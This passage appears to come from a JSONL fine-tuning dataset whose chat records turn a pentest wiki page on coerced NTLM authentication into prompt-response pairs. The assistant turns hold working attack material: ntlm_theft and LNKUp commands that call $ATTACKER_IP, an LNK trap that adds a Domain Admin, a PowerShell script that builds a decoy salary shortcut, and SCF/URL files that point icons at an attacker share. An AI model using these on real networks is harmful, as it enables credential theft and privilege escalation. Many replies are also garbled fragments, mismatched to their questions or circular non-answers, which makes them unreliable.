\n> ```bash\n> ntlm_theft.py --generate all --server $ATTACKER_IP --filename \"@FILENAME\"\n> ```\n\n::: tabs\n\n=== .lnk\n\nAn LNK shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n> Shortcuts with the .lnk extension have a lot of beneficial properties when it comes to stealth; [they are an exception](https://en.wikipedia.org/wiki/Shortcut_(computing)#Microsoft_Windows) from the Windows setting to show or hide file extensions. Even when “hide known file extensions” is disabled, explorer.exe will only show the name, allowing us to let it end in “.jpeg”. A major downside is that they only allow 1024 characters for the whole command they execute. ([source](https://hatching.io/blog/lnk-hta-polyglot/))\n\n[LNKUp](https://github.com/Plazmaz/LNKUp) (Python) is a great tool to generate malicious LNK shortcuts. They can be set with a remote icon file to generate outgoing SMB traffic and authentications but can also be set to execute commands when opened (i.e. double-clicked).", "metadata": {"corpus_index": 855, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "smbmap"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Living off the land - Shortcut files (scf, lnk, url)?"}, {"role": "assistant", "content": "> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt\n> ```\n\n> [!TIP]\n> Shortcut file names can be preprended with a `@` symbol to put them on top of the share, to make sure the file explorer has to parse it.\n\n> [!TIP]\n> The [ntlm_theft](https://github.com/Greenwolf/ntlm_theft) (Python) tool can be used to generate multiple file types at once (lnk, scf, url, docx, xslx, htm, xml, pdf, ...).\n> \n> ```bash\n> ntlm_theft.py --generate all --server $ATTACKER_IP --filename \"@FILENAME\"\n> ```\n\n::: tabs\n\n=== .lnk\n\nAn LNK shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n> Shortcuts with the .lnk extension have a lot of beneficial properties when it comes to stealth; [they are an exception](https://en.wikipedia.org/wiki/Shortcut_(computing)#Microsoft_Windows) from the Windows setting to show or hide file extensions. Even when “hide known file extensions” is disabled, explorer.exe will only show the name, allowing us to let it end in “.jpeg”. A major downside is that they only allow 1024 characters for the whole command they execute. ([source](https://hatching.io/blog/lnk-hta-polyglot/))\n\n[LNKUp](https://github.com/Plazmaz/LNKUp) (Python) is a great tool to generate malicious LNK shortcuts. They can be set with a remote icon file to generate outgoing SMB traffic and authentications but can also be set to execute commands when opened (i.e. double-clicked)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Living off the land - Shortcut files (scf, lnk, url)?", "response": "> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt\n> ```\n\n> [!TIP]\n> Shortcut file names can be preprended with a `@` symbol to put them on top of the share, to make sure the file explorer has to parse it.\n\n> [!TIP]\n> The [ntlm_theft](https://github.com/Greenwolf/ntlm_theft) (Python) tool can be used to generate multiple file types at once (lnk, scf, url, docx, xslx, htm, xml, pdf, ...).\n> \n> ```bash\n> ntlm_theft.py --generate all --server $ATTACKER_IP --filename \"@FILENAME\"\n> ```\n\n::: tabs\n\n=== .lnk\n\nAn LNK shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n> Shortcuts with the .lnk extension have a lot of beneficial properties when it comes to stealth; [they are an exception](https://en.wikipedia.org/wiki/Shortcut_(computing)#Microsoft_Windows) from the Windows setting to show or hide file extensions. Even when “hide known file extensions” is disabled, explorer.exe will only show the name, allowing us to let it end in “.jpeg”. A major downside is that they only allow 1024 characters for the whole command they execute. ([source](https://hatching.io/blog/lnk-hta-polyglot/))\n\n[LNKUp](https://github.com/Plazmaz/LNKUp) (Python) is a great tool to generate malicious LNK shortcuts. They can be set with a remote icon file to generate outgoing SMB traffic and authentications but can also be set to execute commands when opened (i.e. double-clicked).", "metadata": {"corpus_index": 855, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - shortcut files (scf, lnk, url). Shortcut files (scf, lnk, url)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> smbmap -d \"domain\" -u \"user\" -p \"password\" --host-file targets.txt`?", "response": "This command is used for 🛠️ living off the land - shortcut files (scf, lnk, url). Shortcut files (scf, lnk, url)", "metadata": {"corpus_index": 855, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Simple SMB trap with remote icon file?"}, {"role": "assistant", "content": "LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Simple SMB trap with remote icon file?", "response": "LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk'", "metadata": {"corpus_index": 856, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Simple SMB trap with remote icon file"}, {"role": "assistant", "content": "LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Simple SMB trap with remote icon file", "response": "LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk'", "metadata": {"corpus_index": 856, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is SMB trap + command execution?"}, {"role": "assistant", "content": "LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk' --execute \"net group 'Domain Admins' Pentester01 /domain /add\"\n``\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is SMB trap + command execution?", "response": "LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk' --execute \"net group 'Domain Admins' Pentester01 /domain /add\"\n``\n\n``bash", "metadata": {"corpus_index": 857, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for SMB trap + command execution"}, {"role": "assistant", "content": "LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk' --execute \"net group 'Domain Admins' Pentester01 /domain /add\"\n``\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for SMB trap + command execution", "response": "LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk' --execute \"net group 'Domain Admins' Pentester01 /domain /add\"\n``\n\n``bash", "metadata": {"corpus_index": 857, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Simple SMB trap with remote icon file (Powershell)"}, {"role": "assistant", "content": "$objShell = New-Object -ComObject WScript.Shell\n$lnk = $objShell.CreateShortcut(\"C:\\Windows\\temp\\@Salaries-2023.lnk\")\n$lnk.TargetPath = \"\\\\\\@icon.png\"\n$lnk.WindowStyle = 1\n$lnk.IconLocation = \"%windir%\\system32\\shell32.dll, 3\"\n$lnk.Description = \"Salaries-2023.\"\n$lnk.HotKey = \"Ctrl+Alt+O\"\n$lnk.Save()\n``\n\n> [!TIP]\n> Advanced traps\n> \n> * LNK files can be mixed with some VBA: Pwned by Shortcut\n> * LNK files can be mixed with some HTA: LNK HTA Polyglot\n\nNetExec (Python) can be used to automatically push LNK files to a writeable share.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Simple SMB trap with remote icon file (Powershell)", "response": "$objShell = New-Object -ComObject WScript.Shell\n$lnk = $objShell.CreateShortcut(\"C:\\Windows\\temp\\@Salaries-2023.lnk\")\n$lnk.TargetPath = \"\\\\\\@icon.png\"\n$lnk.WindowStyle = 1\n$lnk.IconLocation = \"%windir%\\system32\\shell32.dll, 3\"\n$lnk.Description = \"Salaries-2023.\"\n$lnk.HotKey = \"Ctrl+Alt+O\"\n$lnk.Save()\n``\n\n> [!TIP]\n> Advanced traps\n> \n> * LNK files can be mixed with some VBA: Pwned by Shortcut\n> * LNK files can be mixed with some HTA: LNK HTA Polyglot\n\nNetExec (Python) can be used to automatically push LNK files to a writeable share.\n\n``bash", "metadata": {"corpus_index": 858, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Simple SMB trap with remote icon file (Powershell)?"}, {"role": "assistant", "content": "$objShell = New-Object -ComObject WScript.Shell\n$lnk = $objShell.CreateShortcut(\"C:\\Windows\\temp\\@Salaries-2023.lnk\")\n$lnk.TargetPath = \"\\\\\\@icon.png\"\n$lnk.WindowStyle = 1\n$lnk.IconLocation = \"%windir%\\system32\\shell32.dll, 3\"\n$lnk.Description = \"Salaries-2023.\"\n$lnk.HotKey = \"Ctrl+Alt+O\"\n$lnk.Save()\n``\n\n> [!TIP]\n> Advanced traps\n> \n> * LNK files can be mixed with some VBA: Pwned by Shortcut\n> * LNK files can be mixed with some HTA: LNK HTA Polyglot\n\nNetExec (Python) can be used to automatically push LNK files to a writeable share.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Simple SMB trap with remote icon file (Powershell)?", "response": "$objShell = New-Object -ComObject WScript.Shell\n$lnk = $objShell.CreateShortcut(\"C:\\Windows\\temp\\@Salaries-2023.lnk\")\n$lnk.TargetPath = \"\\\\\\@icon.png\"\n$lnk.WindowStyle = 1\n$lnk.IconLocation = \"%windir%\\system32\\shell32.dll, 3\"\n$lnk.Description = \"Salaries-2023.\"\n$lnk.HotKey = \"Ctrl+Alt+O\"\n$lnk.Save()\n``\n\n> [!TIP]\n> Advanced traps\n> \n> * LNK files can be mixed with some VBA: Pwned by Shortcut\n> * LNK files can be mixed with some HTA: LNK HTA Polyglot\n\nNetExec (Python) can be used to automatically push LNK files to a writeable share.\n\n``bash", "metadata": {"corpus_index": 858, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Simple SMB trap with remote icon file (Powershell)?"}, {"role": "assistant", "content": "> [!TIP]\n> Advanced traps\n> \n> * LNK files can be mixed with some VBA: [Pwned by Shortcut](https://medium.com/secjuice/pwned-by-a-shortcut-b21473970944)\n> * LNK files can be mixed with some HTA: [LNK HTA Polyglot](https://hatching.io/blog/lnk-hta-polyglot/)\n\n[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to automatically push LNK files to a writeable share."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Simple SMB trap with remote icon file (Powershell)?", "response": "> [!TIP]\n> Advanced traps\n> \n> * LNK files can be mixed with some VBA: [Pwned by Shortcut](https://medium.com/secjuice/pwned-by-a-shortcut-b21473970944)\n> * LNK files can be mixed with some HTA: [LNK HTA Polyglot](https://hatching.io/blog/lnk-hta-polyglot/)\n\n[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to automatically push LNK files to a writeable share.", "metadata": {"corpus_index": 859, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for simple smb trap with remote icon file (powershell). Simple SMB trap with remote icon file (Powershell)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for simple smb trap with remote icon file (powershell). Simple SMB trap with remote icon file (Powershell)", "metadata": {"corpus_index": 859, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Creation & upload?"}, {"role": "assistant", "content": "nxc smb \"target\" -d \"domain\" -u \"user\" -p \"password\" -M slinky -O NAME=\"SHARE\" SERVER=\"ATTACKER_IP\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Creation & upload?", "response": "nxc smb \"target\" -d \"domain\" -u \"user\" -p \"password\" -M slinky -O NAME=\"SHARE\" SERVER=\"ATTACKER_IP\"", "metadata": {"corpus_index": 860, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Creation & upload"}, {"role": "assistant", "content": "nxc smb \"target\" -d \"domain\" -u \"user\" -p \"password\" -M slinky -O NAME=\"SHARE\" SERVER=\"ATTACKER_IP\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Creation & upload", "response": "nxc smb \"target\" -d \"domain\" -u \"user\" -p \"password\" -M slinky -O NAME=\"SHARE\" SERVER=\"ATTACKER_IP\"", "metadata": {"corpus_index": 860, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Cleanup"}, {"role": "assistant", "content": "nxc smb \"target\" -d \"domain\" -u \"user\" -p \"password\" -M slinky -O NAME=\"SHARE\" SERVER=\"ATTACKER_IP\" CLEANUP=True\n``\n\n=== .scf\n\nAn SCF shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n`bash\n[Shell]\nCommand=2\nIconFile=\\\\$ATTACKER_IP\\something\\something.ico\n[Taskbar]\nCommand=ToggleDesktop\n`\n\n=== .url\n\nA URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n`bash\n[InternetShortcut]\nURL=https://www.thehacker.recipes/\nIconIndex=0\nIconFile=\\\\$ATTACKER_IP\\something\\something.ico\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Cleanup", "response": "nxc smb \"target\" -d \"domain\" -u \"user\" -p \"password\" -M slinky -O NAME=\"SHARE\" SERVER=\"ATTACKER_IP\" CLEANUP=True\n``\n\n=== .scf\n\nAn SCF shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n`bash\n[Shell]\nCommand=2\nIconFile=\\\\$ATTACKER_IP\\something\\something.ico\n[Taskbar]\nCommand=ToggleDesktop\n`\n\n=== .url\n\nA URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n`bash\n[InternetShortcut]\nURL=https://www.thehacker.recipes/\nIconIndex=0\nIconFile=\\\\$ATTACKER_IP\\something\\something.ico\n``\n\n:::", "metadata": {"corpus_index": 861, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Cleanup during a pentest?"}, {"role": "assistant", "content": "nxc smb \"target\" -d \"domain\" -u \"user\" -p \"password\" -M slinky -O NAME=\"SHARE\" SERVER=\"ATTACKER_IP\" CLEANUP=True\n``\n\n=== .scf\n\nAn SCF shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n`bash\n[Shell]\nCommand=2\nIconFile=\\\\$ATTACKER_IP\\something\\something.ico\n[Taskbar]\nCommand=ToggleDesktop\n`\n\n=== .url\n\nA URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n`bash\n[InternetShortcut]\nURL=https://www.thehacker.recipes/\nIconIndex=0\nIconFile=\\\\$ATTACKER_IP\\something\\something.ico\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Cleanup during a pentest?", "response": "nxc smb \"target\" -d \"domain\" -u \"user\" -p \"password\" -M slinky -O NAME=\"SHARE\" SERVER=\"ATTACKER_IP\" CLEANUP=True\n``\n\n=== .scf\n\nAn SCF shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n`bash\n[Shell]\nCommand=2\nIconFile=\\\\$ATTACKER_IP\\something\\something.ico\n[Taskbar]\nCommand=ToggleDesktop\n`\n\n=== .url\n\nA URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.\n\n`bash\n[InternetShortcut]\nURL=https://www.thehacker.recipes/\nIconIndex=0\nIconFile=\\\\$ATTACKER_IP\\something\\something.ico\n``\n\n:::", "metadata": {"corpus_index": 861, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Cleanup?"}, {"role": "assistant", "content": "=== .scf\n\nAn SCF shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Cleanup?", "response": "=== .scf\n\nAn SCF shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.", "metadata": {"corpus_index": 862, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== .scf`?"}, {"role": "assistant", "content": "This command is used for cleanup. Cleanup"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== .scf`?", "response": "This command is used for cleanup. Cleanup", "metadata": {"corpus_index": 862, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Cleanup during a pentest?"}, {"role": "assistant", "content": "=== .url\n\nA URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Cleanup during a pentest?", "response": "=== .url\n\nA URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.", "metadata": {"corpus_index": 863, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== .url`?"}, {"role": "assistant", "content": "This command is used for cleanup. Cleanup"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== .url`?", "response": "This command is used for cleanup. Cleanup", "metadata": {"corpus_index": 863, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Living off the land - PDF documents"}, {"role": "assistant", "content": "https://github.com/deepzec/Bad-Pdf\n\nhttps://github.com/3gstudent/Worse-PDF"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Living off the land - PDF documents", "response": "https://github.com/deepzec/Bad-Pdf\n\nhttps://github.com/3gstudent/Worse-PDF", "metadata": {"corpus_index": 864, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Living off the land - PDF documents?"}, {"role": "assistant", "content": "https://github.com/deepzec/Bad-Pdf\n\nhttps://github.com/3gstudent/Worse-PDF"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Living off the land - PDF documents?", "response": "https://github.com/deepzec/Bad-Pdf\n\nhttps://github.com/3gstudent/Worse-PDF", "metadata": {"corpus_index": 864, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ Living off the land - Lock screen wallpaper?"}, {"role": "assistant", "content": "https://github.com/nccgroup/Change-Lockscreen\n\nhttps://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ Living off the land - Lock screen wallpaper?", "response": "https://github.com/nccgroup/Change-Lockscreen\n\nhttps://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation", "metadata": {"corpus_index": 865, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Living off the land - Lock screen wallpaper?"}, {"role": "assistant", "content": "https://github.com/nccgroup/Change-Lockscreen\n\nhttps://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Living off the land - Lock screen wallpaper?", "response": "https://github.com/nccgroup/Change-Lockscreen\n\nhttps://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation", "metadata": {"corpus_index": 865, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does LLMNR, NBT-NS, mDNS spoofing work?"}, {"role": "assistant", "content": "In some environments (like Windows ones), multicast name resolution protocols are enabled by default, such as LLMNR (Local-Link Multicast Name Resolution), 